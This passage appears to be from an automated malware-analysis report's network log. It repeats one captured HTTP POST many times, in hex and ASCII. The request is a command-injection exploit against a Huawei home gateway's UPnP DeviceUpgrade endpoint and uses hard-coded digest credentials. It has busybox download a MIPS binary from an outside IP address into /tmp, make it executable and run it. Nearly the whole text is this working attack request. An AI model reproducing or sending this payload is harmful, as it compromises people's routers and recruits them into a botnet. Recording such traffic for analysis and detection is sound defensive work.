/bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 